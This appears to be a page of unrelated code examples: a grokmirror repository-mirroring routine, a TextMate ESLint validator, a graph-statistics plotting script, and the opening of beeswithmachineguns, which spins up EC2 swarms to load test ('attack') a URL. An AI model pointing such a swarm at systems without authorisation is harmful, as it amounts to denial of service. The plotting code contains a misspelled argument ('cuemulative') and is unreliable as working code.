                return 0
            logger.warning('Could not fetch %s' % config['manifest'])
            logger.warning('Server returned: %s' % ex)
            return 1
        except urllib2.URLError, ex:
            logger.warning('Could not fetch %s' % config['manifest'])
            logger.warning('Error was: %s' % ex)
            return 1

        last_modified = ufh.headers.get('Last-Modified')
        last_modified = time.strptime(last_modified, '%a, %d %b %Y %H:%M:%S %Z')
        last_modified = calendar.timegm(last_modified)

        # We don't use read_manifest for the remote manifest, as it can be
        # anything, really. For now, blindly open it with gzipfile if it ends
        # with .gz. XXX: some http servers will auto-deflate such files.
        try:
            if config['manifest'].find('.gz') > 0:
                fh = gzip.GzipFile(fileobj=StringIO(ufh.read()))
            else:
                fh = ufh

            jdata = fh.read()
            fh.close()

            manifest = anyjson.deserialize(jdata)

        except Exception, ex:
            logger.warning('Failed to parse %s' % config['manifest'])
            logger.warning('Error was: %s' % ex)
            return 1

    mymanifest = grokmirror.read_manifest(mymanifest)

    culled = cull_manifest(manifest, config)

    to_clone = []
    to_pull = []
    existing = []

    toplevel = config['toplevel']
    if not os.access(toplevel, os.W_OK):
        logger.critical('Toplevel %s does not exist or is not writable'
                        % toplevel)
        sys.exit(1)

    if 'pull_threads' in config.keys():
        pull_threads = int(config['pull_threads'])
        if pull_threads < 1:
            logger.info('pull_threads is less than 1, forcing to 1')
            pull_threads = 1
    else:
        # be conservative
        logger.info('pull_threads is not set, consider setting it')
        pull_threads = 5

    logger.info('Comparing repository info')

    for gitdir in culled.keys():
        fullpath = os.path.join(toplevel, gitdir.lstrip('/'))

        # fingerprints were added in later versions, so deal if the upstream
        # manifest doesn't have a fingerprint
        if 'fingerprint' not in culled[gitdir]:
            culled[gitdir]['fingerprint'] = None

        # Attempt to lock the repo
        try:
            grokmirror.lock_repo(fullpath, nonblocking=True)
        except IOError:
            logger.info('Could not lock %s, skipping' % gitdir)
            lock_fails.append(gitdir)
            # Force the fingerprint to what we have in mymanifest,
            # if we have it.
            culled[gitdir]['fingerprint'] = None
            if gitdir in mymanifest and 'fingerprint' in mymanifest[gitdir]:
                culled[gitdir]['fingerprint'] = mymanifest[gitdir][
                    'fingerprint']
            if len(lock_fails) >= pull_threads:
                logger.info('Too many repositories locked (%s). Exiting.'
                            % len(lock_fails))
                return 0
            continue

        if verify:
            if culled[gitdir]['fingerprint'] is None:
                logger.debug('No fingerprint for %s, not verifying' % gitdir)
                grokmirror.unlock_repo(fullpath)
                continue

            if not fnmatch.fnmatch(gitdir, verify_subpath):
                grokmirror.unlock_repo(fullpath)
                continue

            logger.debug('Verifying %s' % gitdir)
            if not os.path.exists(fullpath):
                verify_fails.append(gitdir)
                logger.info('Verify: %s ABSENT' % gitdir)
                grokmirror.unlock_repo(fullpath)
                continue

            my_fingerprint = grokmirror.get_repo_fingerprint(
                toplevel, gitdir, force=force)

            if my_fingerprint == culled[gitdir]['fingerprint']:
                logger.info('Verify: %s OK' % gitdir)
            else:
                logger.critical('Verify: %s FAILED' % gitdir)
                verify_fails.append(gitdir)

            grokmirror.unlock_repo(fullpath)
            continue

        # Is the directory in place?
        if os.path.exists(fullpath):
            # Fix owner and description, if necessary
            if gitdir in mymanifest.keys():
                # This code is hurky and needs to be cleaned up
                desc = culled[gitdir].get('description')
                owner = culled[gitdir].get('owner')
                ref = None
                if config['ignore_repo_references'] != 'yes':
                    ref = culled[gitdir].get('reference')

                mydesc = mymanifest[gitdir].get('description')
                myowner = mymanifest[gitdir].get('owner')
                myref = None
                if config['ignore_repo_references'] != 'yes':
                    myref = mymanifest[gitdir].get('reference')

                if owner is None:
                    owner = config['default_owner']
                if myowner is None:
                    myowner = config['default_owner']

                if desc != mydesc or owner != myowner or ref != myref:
                    # we can do this right away without waiting
                    set_repo_params(toplevel, gitdir, owner, desc, ref)

            else:
                # It exists on disk, but not in my manifest?
                if noreuse:
                    logger.critical('Found existing git repo in %s' % fullpath)
                    logger.critical('But you asked NOT to reuse repos')
                    logger.critical('Skipping %s' % gitdir)
                    grokmirror.unlock_repo(fullpath)
                    continue

                logger.info('Setting new origin for %s' % gitdir)
                fix_remotes(gitdir, toplevel, config['site'])
                to_pull.append(gitdir)
                grokmirror.unlock_repo(fullpath)
                continue

            # fingerprints were added late, so if we don't have them
            # in the remote manifest, fall back on using timestamps
            changed = False
            if culled[gitdir]['fingerprint'] is not None:
                logger.debug('Will use fingerprints to compare %s' % gitdir)
                my_fingerprint = grokmirror.get_repo_fingerprint(toplevel,
                                                                 gitdir,
                                                                 force=force)

                if my_fingerprint != culled[gitdir]['fingerprint']:
                    logger.debug('No fingerprint match, will pull %s' % gitdir)
                    changed = True
                else:
                    logger.debug('Fingerprints match, skipping %s' % gitdir)
            else:
                logger.debug('Will use timestamps to compare %s' % gitdir)
                if force:
                    logger.debug('Will force-pull %s' % gitdir)
                    changed = True
                    # set timestamp to 0 as well
                    grokmirror.set_repo_timestamp(toplevel, gitdir, 0)
                else:
                    ts = grokmirror.get_repo_timestamp(toplevel, gitdir)
                    if ts < culled[gitdir]['modified']:
                        changed = True

            if changed:
                to_pull.append(gitdir)
                grokmirror.unlock_repo(fullpath)
                continue
            else:
                logger.debug('Repo %s unchanged' % gitdir)
                # if we don't have a fingerprint for it, add it now
                if culled[gitdir]['fingerprint'] is None:
                    fpr = grokmirror.get_repo_fingerprint(toplevel, gitdir)
                    culled[gitdir]['fingerprint'] = fpr
                existing.append(gitdir)
                grokmirror.unlock_repo(fullpath)
                continue

        else:
            # Newly incoming repo
            to_clone.append(gitdir)
            grokmirror.unlock_repo(fullpath)
            continue

        # If we got here, something is odd.
        # noinspection PyUnreachableCode
        logger.critical('Could not figure out what to do with %s' % gitdir)
        grokmirror.unlock_repo(fullpath)

    if verify:
        if len(verify_fails):
            logger.critical('%s repos failed to verify' % len(verify_fails))
            return 1
        else:
            logger.info('Verification successful')
            return 0

    hookscript = config['post_update_hook']

    # XXX: 0.4.0 final: fix so we can ctrl-c out of threads

    if len(to_pull):
        if len(lock_fails) > 0:
            pull_threads -= len(lock_fails)

        # Don't spin up more threads than we need
        if pull_threads > len(to_pull):
            pull_threads = len(to_pull)

        # exit if we're ever at 0 pull_threads. Shouldn't happen, but some extra
        # precaution doesn't hurt
        if pull_threads <= 0:
            logger.info('Too many repositories locked. Exiting.')
            return 0

        logger.info('Will use %d threads to pull repos' % pull_threads)

        logger.info('Updating %s repos from %s'
                    % (len(to_pull), config['site']))
        in_queue = Queue.Queue()
        out_queue = Queue.Queue()

        for gitdir in to_pull:
            in_queue.put((gitdir, culled[gitdir]['fingerprint'],
                          culled[gitdir]['modified']))

        for i in range(pull_threads):
            logger.debug('Spun up thread %s' % i)
            t = PullerThread(in_queue, out_queue, config, i)
            t.setDaemon(True)
            t.start()

        # wait till it's all done
        in_queue.join()
        logger.info('All threads finished.')

        while not out_queue.empty():
            # see if any of it failed
            (gitdir, my_fingerprint, status) = out_queue.get()
            # We always record our fingerprint in our manifest
            culled[gitdir]['fingerprint'] = my_fingerprint
            if not status:
                # To make sure we check this again during next run,
                # fudge the manifest accordingly.
                logger.debug('Will recheck %s during next run' % gitdir)
                culled[gitdir] = mymanifest[gitdir]
                # this is rather hackish, but effective
                last_modified -= 1

    # how many lockfiles have we seen?
    # If there are more lock_fails than there are
    # pull_threads configured, we skip cloning out of caution
    if len(to_clone) and len(lock_fails) > pull_threads:
        logger.info('Too many repositories locked. Skipping cloning new repos.')
        to_clone = []

    if len(to_clone):
        logger.info('Cloning %s repos from %s'
                    % (len(to_clone), config['site']))
        # we use "existing" to track which repos can be used as references
        existing.extend(to_pull)

        to_clone_sorted = []
        clone_order(to_clone, manifest, to_clone_sorted, existing)

        for gitdir in to_clone_sorted:
            # Do we still need to clone it, or has another process
            # already done this for us?
            ts = grokmirror.get_repo_timestamp(toplevel, gitdir)

            if ts > 0:
                logger.debug('Looks like %s already cloned, skipping' % gitdir)
                continue

            fullpath = os.path.join(toplevel, gitdir.lstrip('/'))

            try:
                grokmirror.lock_repo(fullpath, nonblocking=True)
            except IOError:
                logger.info('Could not lock %s, skipping' % gitdir)
                lock_fails.append(gitdir)
                continue

            reference = None
            if config['ignore_repo_references'] != 'yes':
                reference = culled[gitdir]['reference']

            if reference is not None and reference in existing:
                # Make sure we can lock the reference repo
                refrepo = os.path.join(toplevel, reference.lstrip('/'))
                try:
                    grokmirror.lock_repo(refrepo, nonblocking=True)
                    success = clone_repo(toplevel, gitdir, config['site'],
                                         reference=reference)
                    grokmirror.unlock_repo(refrepo)
                except IOError:
                    logger.info('Cannot lock reference repo %s, skipping %s' %
                                (reference, gitdir))
                    if reference not in lock_fails:
                        lock_fails.append(reference)

                    grokmirror.unlock_repo(fullpath)
                    continue
            else:
                success = clone_repo(toplevel, gitdir, config['site'])

            # check dir to make sure cloning succeeded and then add to existing
            if os.path.exists(fullpath) and success:
                logger.debug('Cloning of %s succeeded, adding to existing'
                             % gitdir)
                existing.append(gitdir)

                desc = culled[gitdir].get('description')
                owner = culled[gitdir].get('owner')
                ref = culled[gitdir].get('reference')

                if owner is None:
                    owner = config['default_owner']
                set_repo_params(toplevel, gitdir, owner, desc, ref)
                set_agefile(toplevel, gitdir, culled[gitdir]['modified'])
                my_fingerprint = grokmirror.set_repo_fingerprint(toplevel,
                                                                 gitdir)
                culled[gitdir]['fingerprint'] = my_fingerprint
                run_post_update_hook(hookscript, toplevel, gitdir)
            else:
                logger.critical('Was not able to clone %s' % gitdir)
                # Remove it from our manifest so we can try re-cloning
                # next time grok-pull runs
                del culled[gitdir]
                git_fails.append(gitdir)

            grokmirror.unlock_repo(fullpath)

    # loop through all entries and find any symlinks we need to set
    # We also collect all symlinks to do purging correctly
    symlinks = []
    for gitdir in culled.keys():
        if 'symlinks' in culled[gitdir].keys():
            source = os.path.join(config['toplevel'], gitdir.lstrip('/'))
            for symlink in culled[gitdir]['symlinks']:
                if symlink not in symlinks:
                    symlinks.append(symlink)
                target = os.path.join(config['toplevel'], symlink.lstrip('/'))

                if os.path.exists(source):
                    if os.path.islink(target):
                        # are you pointing to where we need you?
                        if os.path.realpath(target) != source:
                            # Remove symlink and recreate below
                            logger.debug('Removed existing wrong symlink %s'
                                         % target)
                            os.unlink(target)
                    elif os.path.exists(target):
                        logger.warn('Deleted repo %s, because it is now'
                                    ' a symlink to %s' % (target, source))
                        shutil.rmtree(target)

                    # Here we re-check if we still need to do anything
                    if not os.path.exists(target):
                        logger.info('Symlinking %s -> %s' % (target, source))
                        # Make sure the leading dirs are in place
                        if not os.path.exists(os.path.dirname(target)):
                            os.makedirs(os.path.dirname(target))
                        os.symlink(source, target)

    manifile = config['mymanifest']
    grokmirror.manifest_lock(manifile)

    # Is the local manifest newer than last_modified? That would indicate
    # that another process has run and "culled" is no longer the latest info
    if os.path.exists(manifile):
        fstat = os.stat(manifile)
        if fstat[8] > last_modified:
            logger.info('Local manifest is newer, not saving.')
            grokmirror.manifest_unlock(manifile)
            return 0

    if purge:
        to_purge = []
        found_repos = 0
        for founddir in grokmirror.find_all_gitdirs(config['toplevel']):
            gitdir = founddir.replace(config['toplevel'], '')
            found_repos += 1

            if gitdir not in culled.keys() and gitdir not in symlinks:
                to_purge.append(founddir)

        if len(to_purge):
            # Purge-protection engage
            try:
                purge_limit = int(config['purgeprotect'])
                assert 1 <= purge_limit <= 99
            except (ValueError, AssertionError):
                logger.critical('Warning: "%s" is not valid for purgeprotect.'
                                % config['purgeprotect'])
                logger.critical('Please set to a number between 1 and 99.')
                logger.critical('Defaulting to purgeprotect=5.')
                purge_limit = 5

            purge_pc = len(to_purge) * 100 / found_repos
            logger.debug('purgeprotect=%s' % purge_limit)
            logger.debug('purge prercentage=%s' % purge_pc)

            if not forcepurge and purge_pc >= purge_limit:
                logger.critical('Refusing to purge %s repos (%s%%)'
                                % (len(to_purge), purge_pc))
                logger.critical('Set purgeprotect to a higher percentage, or'
                                ' override with --force-purge.')
                logger.info('Not saving local manifest')
                return 1
            else:
                for founddir in to_purge:
                    if os.path.islink(founddir):
                        logger.info('Removing unreferenced symlink %s' % gitdir)
                        os.unlink(founddir)
                    else:
                        try:
                            logger.info('Purging %s' % founddir)
                            grokmirror.lock_repo(founddir, nonblocking=True)
                            shutil.rmtree(founddir)
                        except IOError:
                            lock_fails.append(gitdir)
                            logger.info('%s is locked, not purging' % gitdir)

    # Go through all repos in culled and get the latest local timestamps.
    for gitdir in culled:
        ts = grokmirror.get_repo_timestamp(toplevel, gitdir)
        culled[gitdir]['modified'] = ts

    # If there were any lock failures, we fudge last_modified to always
    # be older than the server, which will force the next grokmirror run.
    if len(lock_fails):
        logger.info('%s repos could not be locked. Forcing next run.'
                    % len(lock_fails))
        last_modified -= 1
    elif len(git_fails):
        logger.info('%s repos failed. Forcing next run.'
                    % len(git_fails))
        last_modified -= 1

    # Once we're done, save culled as our new manifest
    grokmirror.write_manifest(manifile, culled, mtime=last_modified,
                              pretty=pretty)

    grokmirror.manifest_unlock(manifile)

    # write out projects.list, if asked to
    write_projects_list(culled, config)

    return 127

Example 170

Project: javascript-eslint.tmbundle Source File: validate.py
def validate(quiet=False):
    # absolute path of this file, used to reference other files
    my_dir = os.path.abspath(os.path.dirname(__file__))

    # build eslint args
    args = [
        os.environ.get('TM_JAVASCRIPT_ESLINT_ESLINT', 'eslint'),
        '-f',
        'compact',
        '--no-color',
        '--stdin'
    ]

    # if we know the filename, pass it
    if 'TM_FILEPATH' in os.environ:
        args.append('--stdin-filename')
        args.append(os.path.basename(os.environ['TM_FILEPATH']))

    # the working directory; used by eslint to find its config files
    cwd = os.environ.get('TM_DIRECTORY', None)
    if not cwd:
        cwd = os.environ.get('TM_PROJECT_DIRECTORY', None)

    # Build env for our command: ESLint (and Node) are often
    # installed to /usr/local/bin, which may not be on the
    # bundle’s PATH in a default install of TextMate.
    env = os.environ.copy()
    path_parts = env['PATH'].split(':')
    if '/bin' not in path_parts:
        path_parts.append('/bin')
    if '/usr/bin' not in path_parts:
        path_parts.append('/usr/bin')
    if '/usr/local/bin' not in path_parts:
        path_parts.append('/usr/local/bin')
    env['PATH'] = ':'.join(path_parts)

    try:
        eslint = subprocess.Popen(
            args,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            env=env,
            cwd=cwd
        )
    except OSError as e:
        msg = [
            'Hi there. This is the “JavaScript ESLint” bundle for ' +
            'TextMate. I validate your code using ESLint.',
            '',
            'I had the following problem running <code>eslint</code>:',
            '',
            '<code>%s</code>' % e,
            '',
            '<h4>How to fix it</h4>',
            'Make sure the <code>eslint</code> and <code>node</code> ' +
            'commands are on the <code>PATH</code>.',
            '',
            '<ol>' +
            '   <li>Go to <i>TextMate</i> > <i>Preferences…</i> > ' +
            '       <i>Variables</i></li>' +
            '   <li>Ensure the <code>PATH</code> is enabled there and that ' +
            '       it includes the location of your <code>eslint</code> ' +
            '       and <code>node</code> commands.</li>'
            '</ol>',
            'The path currently used by TextMate bundles is:',
            '',
            '<div style="overflow:auto"><code>%s</code></div>' % env['PATH'],
            '<h4>How to disable validation</h4>',
            'If you mistakenly installed this validation tool and want to ' +
            'disable it, you can do so in TextMate:',
            '',
            '<ol>' +
            '   <li>On the TextMate menu, choose ' +
            '   <i>Bundles</i> > <i>Edit Bundles…</i></li>' +
            '   <li>Locate “JavaScript ESLint”</li>' +
            '   <li>Uncheck “Enable this item”</li>' +
            '   <li>Close the Bundle Editor and choose “Save”</li>' +
            '</ol>'
        ]
        show_error_message('<br>'.join(msg))
        sys.exit()

    # Pipe stdin to the subprocess; if we are validating an HTML
    # file with embedded JavaScript, only pipe content within the
    # <script>…</script> tags to the subprocess.
    lines = []
    if os.environ['TM_SCOPE'].startswith('source.js'):
        for line in sys.stdin:
            lines.append(line)
    else:
        start_tag = re.compile('(\<\s*script)[\s\>]', re.IGNORECASE)
        end_tag = re.compile('\<\/\s*script[\s\>]', re.IGNORECASE)
        state = 'IGNORE'
        for line in sys.stdin:
            while line:
                if state == 'IGNORE':
                    match = start_tag.search(line)
                    if match:
                        # found a script tag
                        line = ' ' * match.end(1) + line[match.end(1):]
                        state = 'LOOK_FOR_END_OF_OPENING_TAG'
                    else:
                        lines.append('\n')
                        line = None

                elif state == 'LOOK_FOR_END_OF_OPENING_TAG':
                    gt_pos = line.find('>')
                    if gt_pos != -1:
                        line = ' ' * (gt_pos + 1) + line[gt_pos + 1:]
                        state = 'PIPE_TO_OUTPUT'
                    else:
                        lines.append('\n')
                        line = None

                elif state == 'PIPE_TO_OUTPUT':
                    match = end_tag.search(line)
                    if match:
                        # found closing </script> tag
                        lines.append(line[:match.start()])
                        line = line[match.end():]
                        state = 'IGNORE'
                    else:
                        lines.append(line)
                        line = None

    (stdout, stderr) = eslint.communicate(''.join(lines))

    if stderr:
        msg = [
            'Hi there. This is the “JavaScript ESLint” bundle for ' +
            'TextMate. I validate your code using ESLint.',
            '',
            'I had the following problem running <code>eslint</code>:',
            '',
            '<code>%s</code>' % stderr,
            '',
            '<h4>How to disable validation</h4>',
            'If you mistakenly installed this validation tool and want to ' +
            '   disable it, you can do so in TextMate:',
            '',
            '<ol>' +
            '   <li>On the TextMate menu, choose ' +
            '   <i>Bundles</i> > <i>Edit Bundles…</i></li>' +
            '   <li>Locate “JavaScript ESLint”</li>' +
            '   <li>Uncheck “Enable this item”</li>' +
            '   <li>Close the Bundle Editor and choose “Save”</li>' +
            '</ol>'
        ]
        show_error_message('<br>'.join(msg))
        sys.exit()

    # parse the results

    rx = re.compile(
        '^[^:]+\: line (?P<line>\d+), col (?P<character>\d+), ' +
        '(?P<code>\w+) - (?P<reason>.+?)(\s\((?P<shortname>[\w\-]+)\))?$'
    )

    issues = []

    for line in stdout.split('\n'):
        line = line.strip()
        if not line:
            continue

        m = rx.match(line)

        if not m:
            continue

        issue = {
            'line': int(m.group('line')),
            'character': int(m.group('character')) + 1,
            'code': m.group('code'),
            'reason': m.group('reason')
        }

        if m.group('shortname'):
            issue['shortname'] = m.group('shortname')

        issues.append(issue)

    # normalize line numbers
    input_start_line = int(os.environ.get('TM_INPUT_START_LINE', 1)) - 1
    for issue in issues:
        issue['line'] += input_start_line

    # add URLs to the issues
    if 'TM_FILEPATH' in os.environ:
        url_maker = lambda x: \
            'txmt://open?url=file://%s&amp;line=%d&amp;column=%d' % \
            (os.environ['TM_FILEPATH'], x['line'], x['character'])
    else:
        url_maker = lambda x: \
            'txmt://open?line=%d&amp;column=%d' % (x['line'], x['character'])

    for issue in issues:
        issue['url'] = url_maker(issue)

    # context data we will send to JavaScript
    context = {
        'issues': issues,
        'timestamp': time.strftime('%c')
    }

    if 'TM_FILEPATH' in os.environ:
        context['fileUrl'] = \
            'txmt://open?url=file://%s' % os.environ['TM_FILEPATH']
        context['targetFilename'] = os.path.basename(os.environ['TM_FILEPATH'])
    else:
        context['fileUrl'] = 'txmt://open?line=1&amp;column=0'
        context['targetFilename'] = '(current unsaved file)'

    # Identify the marker file that we will use to indicate the
    # TM_FILEPATH of the file currently shown in the validation
    # window.
    markerDir = get_marker_directory()
    hash = hashlib.sha224(context['fileUrl']).hexdigest()
    context['markerFile'] = os.path.join(markerDir, hash + '.marker')

    context['errorCount'] = \
        len([_ for _ in context['issues'] if _['code'][0] == 'E'])
    context['warningCount'] = \
        len([_ for _ in context['issues'] if _['code'][0] == 'W'])

    if context['errorCount'] == 0 and context['warningCount'] == 0:
        # There are no errors or warnings. We can bail out if all of
        # the following are True:
        #
        #     * There is no validation window currently open for
        #       this docuement.
        #     * quiet is True.
        if not os.path.exists(context['markerFile']):
            if quiet:
                return

    # create the marker file
    markerFile = open(context['markerFile'], 'w+')
    markerFile.close()

    # read and prepare the template
    content_ejs_path = os.path.join(my_dir, 'content.ejs')
    content_ejs = open(content_ejs_path, 'r').read()

    template_path = os.path.join(my_dir, 'template.html')
    template = open(template_path, 'r').read()
    template = template.replace(
        '{{ TM_BUNDLE_SUPPORT }}',
        os.environ['TM_BUNDLE_SUPPORT']
    )
    template = template.replace('{{ EJS_TEMPLATE }}', json.dumps(content_ejs))
    template = template.replace('{{ CONTEXT }}', json.dumps(context))

    print(template)

Example 171

Project: ndgrutedb Source File: smallDistPlot.py
def newPlotStdMean(invDir, pngName, char, numBins =100, function = 'mean', numLCCVerticesfn = None):

  MADdir = "MAD"
  ccDir = "ClustCoeff"
  DegDir = "Degree"
  EigDir = "Eigen/values"
  SS1dir = "ScanStat1"
  triDir = "Triangle"

  invDirs = [triDir, ccDir, SS1dir, DegDir ]

  print "function =" + function

  charVal = 'Classification' if char == 'class' else 'Gender'
  funcVal = '$\mu$' if function == 'mean' else '$\sigma$'

  nrows = 3
  ncols=2

  if not numLCCVerticesfn:
    matDimZero = 70
  else:
    matDimZero = getMaxVertices(numLCCVerticesfn)
    print "Max dimension --> ", matDimZero

  if not os.path.exists(invDir):
    print "%s does not exist" % invDir
    sys.exit(1)

  pl.figure(2)
  fig_gl, axes = pl.subplots(nrows=nrows, ncols=ncols)
  #fig_gl.tight_layout()

  for idx, drcty in enumerate (invDirs):

    matricesArray = assembleAggMatrices(glob(os.path.join(invDir, drcty,'*.npy')), char, matDimZero)
    processingArrs = perfOpOnMatrices(matricesArray, function, True)



    for proccCnt, arr in enumerate (processingArrs):
      pl.figure(1)
      n, bins, patches = pl.hist(arr, bins=numBins , range=None, normed=False, weights=None, cuemulative=False, \
               bottom=None, histtype='stepfilled', align='mid', orientation='vertical', \
               rwidth=None, log=False, color=None, label=None, hold=None)

      n = np.append(n,0)
      n = n/float(sum(n))

      # Interpolation
      f = interpolate.interp1d(bins, n, kind='cubic')

      if numLCCVerticesfn:
        x = np.arange(bins[0],bins[-1],0.03) # vary linspc
      else:
        x = np.arange(bins[0],bins[-1],0.07) # vary linspc

      interp = f(x)
      ltz = interp < 0
      interp[ltz] = 0

      fig = pl.figure(2)
      fig.subplots_adjust(hspace=.6)

      #ax = pl.subplot(nrows,ncols,(idx*ncols)+2) if proccCnt > 0 else pl.subplot(nrows,ncols,(idx*ncols)+1)
      ax = pl.subplot(nrows,ncols,idx+1)

      plot_color = getPlotColor(proccCnt, allmat = False)

      if function == 'mean':
        pl.plot(x, interp*100, color = plot_color, linewidth=1)
      elif function == 'stddev':
        pl.plot(x, interp, color = plot_color, linewidth=1)

      if idx == 0:
        if function == 'mean':
          if numLCCVerticesfn:
            pass
            #plt.axis([0, 35, 0, 0.04])
            #ax.set_yticks(scipy.arange(0,0.04,0.01))
          else:
            ax.set_yticks(scipy.arange(0,7,2))
        elif function == 'stddev':
          ax.set_yticks(scipy.arange(0,0.07,0.02))
        if proccCnt == 0:
          if function == 'mean':
            pl.ylabel('Percent')
          elif function == 'stddev':
            pl.ylabel('Magnitude')
          pl.xlabel('Log Number of Local Triangles')
        else:
          pl.xlabel('Log Number of Triangles')

      if idx == 1:
        if function == 'mean':
          if numLCCVerticesfn:
            #ax.set_yticks(scipy.arange(0,0.03,0.01))
            pass
          else:
            ax.set_yticks(scipy.arange(0,10,2))
        elif function == 'stddev':
          ax.set_yticks(scipy.arange(0,0.15,0.03))

        pl.xlabel('Log Local Clustering Coefficient')

      if idx == 2:
        if function == 'mean':
          if numLCCVerticesfn:
            pass
            #ax.set_yticks(scipy.arange(0,0.03,0.01))
          else:
            ax.set_yticks(scipy.arange(0,8,2))
        elif function == 'stddev':
          ax.set_yticks(scipy.arange(0,0.08,0.02))
        if proccCnt == 0:
          if function == 'mean':
            pl.ylabel('Percent')
          elif function == 'stddev':
            pl.ylabel('Magnitude')

        pl.xlabel('Log Scan_1 Statistic')

      if idx == 3:
        if function == 'mean':
          if numLCCVerticesfn:
            pass
            #ax.set_yticks(scipy.arange(0,0.04,0.01))
          else:
            ax.set_yticks(scipy.arange(0,6,2))
        if function == 'stddev':
          ax.set_yticks(scipy.arange(0,0.08,0.02))
          ax.set_xticks(scipy.arange(-2.5,2.0,1.0))

        pl.xlabel('Log Degree')

  #### Eigenvalues ####

  if not numLCCVerticesfn:
    numEigs = 68
  else:
    numEigs = 100

  ax = pl.subplot(nrows,ncols,5)
  matricesArray = assembleAggMatrices(glob(os.path.join(invDir, EigDir,'*.npy')), char, numEigs, eig = True)
  processingArrs = perfOpOnMatrices(matricesArray, function, False)

  for proccCnt, arr in enumerate (processingArrs):
    plot_color = getPlotColor(proccCnt, allmat = False)

    fig = pl.figure(2)
    fig.subplots_adjust(hspace=.6)

    if function == 'mean':
      if numLCCVerticesfn:
        pass
      else:
        ax.set_yticks(scipy.arange(-0.2,0.2,0.1))
      pl.plot(range(1,len(arr)+1), arr/10000, color=plot_color)
    elif function == 'stddev':
      ax.set_yticks(scipy.arange(0,35,10))
      pl.plot(range(1,len(arr)+1), arr/10, color=plot_color)

  pl.xlabel('Eigenvalue rank')
  if function == 'mean':
    pl.ylabel('Magnitude x $10^4$ ')
  elif function == 'stddev':
    pl.ylabel('Magnitude x $ 10$ ')

  pl.xlabel('Eigenvalue rank')

  ######## Global Edge number #######

  charDict, zero_type, one_type, two_type = csvtodict(char = char)
  ax = pl.subplot(nrows,ncols,6)

  arrfn = os.path.join(invDir, 'Globals/numEdgesDict.npy')
  try:
    ass_ray = np.load(arrfn).item() # associative array
    print "Processing %s..." % arrfn
  except:
    print "[ERROR]: Line %s: Invariant file not found %s"  % (lineno(),arrfn)

  zeros = []
  ones = []
  twos = []

  for key in ass_ray.keys():
    if charDict[key] == '0':
      zeros.append(ass_ray[key])
    if charDict[key] == '1':
      ones.append(ass_ray[key])
    if charDict[key] == '2':
      twos.append(ass_ray[key])

  processingArrs = [zeros, ones]
  if char == 'class':
    processingArrs.append(twos)

  for proccCnt, arr in enumerate (processingArrs):
    pl.figure(1)

    arr = np.log(np.array(arr)[np.array(arr).nonzero()]) # NOTE THIS CHANGE

    n, bins, patches = pl.hist(arr, bins=10 , range=None, normed=False, weights=None, cuemulative=False, \
             bottom=None, histtype='stepfilled', align='mid', orientation='vertical', \
             rwidth=None, log=False, color=None, label=None, hold=None)

    n = np.append(n,0)
    fig = pl.figure(2)
    fig.subplots_adjust(hspace=.5)

    pl.ylabel('Frequency')

    pl.xlabel('Log Global Edge Number')
    if numLCCVerticesfn:
      pass
    else:
      #ax.set_yticks(scipy.arange(0,15,3))
      #ax.set_xticks(scipy.arange(800,1250,200))
      pass

    f = interpolate.interp1d(bins, n, kind='cubic')
    x = np.arange(bins[0],bins[-1],0.01) # vary linspc

    interp = f(x)
    ltz = interp < 0
    interp[ltz] = 0

    plot_color = getPlotColor(proccCnt, allmat = False)
    pl.plot(x, interp,color = plot_color ,linewidth=1)

  pl.savefig(pngName+'.pdf')
  print '~**** Done  ****~'

Example 172

Project: beeswithmachineguns Source File: main.py
Function: parse_options
def parse_options():
    """
    Handle the command line arguments for spinning up bees
    """
    parser = OptionParser(usage="""
bees COMMAND [options]

Bees with Machine Guns

A utility for arming (creating) many bees (small EC2 instances) to attack
(load test) targets (web applications).

commands:
  up      Start a batch of load testing servers.
  attack  Begin the attack on a specific url.
  down    Shutdown and deactivate the load testing servers.
  report  Report the status of the load testing servers.
    """)

    up_group = OptionGroup(parser, "up",
                           """In order to spin up new servers you will need to specify at least the -k command, which is the name of the EC2 keypair to use for creating and connecting to the new servers. The bees will expect to find a .pem file with this name in ~/.ssh/. Alternatively, bees can use SSH Agent for the key.""")

    # Required
    up_group.add_option('-k', '--key',  metavar="KEY",  nargs=1,
                        action='store', dest='key', type='string',
                        help="The ssh key pair name to use to connect to the new servers.")

    up_group.add_option('-s', '--servers', metavar="SERVERS", nargs=1,
                        action='store', dest='servers', type='int', default=5,
                        help="The number of servers to start (default: 5).")
    up_group.add_option('-g', '--group', metavar="GROUP", nargs=1,
                        action='store', dest='group', type='string', default='default',
                        help="The security group(s) to run the instances under (default: default).")
    up_group.add_option('-z', '--zone',  metavar="ZONE",  nargs=1,
                        action='store', dest='zone', type='string', default='us-east-1d',
                        help="The availability zone to start the instances in (default: us-east-1d).")
    up_group.add_option('-i', '--instance',  metavar="INSTANCE",  nargs=1,
                        action='store', dest='instance', type='string', default='ami-ff17fb96',
                        help="The instance-id to use for each server from (default: ami-ff17fb96).")
    up_group.add_option('-t', '--type',  metavar="TYPE",  nargs=1,
                        action='store', dest='type', type='string', default='t1.micro',
                        help="The instance-type to use for each server (default: t1.micro).")
    up_group.add_option('-l', '--login',  metavar="LOGIN",  nargs=1,
                        action='store', dest='login', type='string', default='newsapps',
                        help="The ssh username name to use to connect to the new servers (default: newsapps).")
    up_group.add_option('-v', '--subnet',  metavar="SUBNET",  nargs=1,
                        action='store', dest='subnet', type='string', default=None,
                        help="The vpc subnet id in which the instances should be launched. (default: None).")
    up_group.add_option('-b', '--bid', metavar="BID", nargs=1,
                        action='store', dest='bid', type='float', default=None,
                        help="The maximum bid price per spot instance (default: None).")

    parser.add_option_group(up_group)

    attack_group = OptionGroup(parser, "attack",
                               """Beginning an attack requires only that you specify the -u option with the URL you wish to target.""")

    # Required
    attack_group.add_option('-u', '--url', metavar="URL", nargs=1,
                            action='store', dest='url', type='string',
                            help="URL of the target to attack.")
    attack_group.add_option('-K', '--keepalive', metavar="KEEP_ALIVE", nargs=0,
                            action='store', dest='keep_alive', type='string', default=False,
                            help="Keep-Alive connection.")
    attack_group.add_option('-p', '--post-file',  metavar="POST_FILE",  nargs=1,
                            action='store', dest='post_file', type='string', default=False,
                            help="The POST file to deliver with the bee's payload.")
    attack_group.add_option('-m', '--mime-type',  metavar="MIME_TYPE",  nargs=1,
                            action='store', dest='mime_type', type='string', default='text/plain',
                            help="The MIME type to send with the request.")
    attack_group.add_option('-n', '--number', metavar="NUMBER", nargs=1,
                            action='store', dest='number', type='int', default=1000,
                            help="The number of total connections to make to the target (default: 1000).")
    attack_group.add_option('-C', '--cookies', metavar="COOKIES", nargs=1, action='store', dest='cookies',
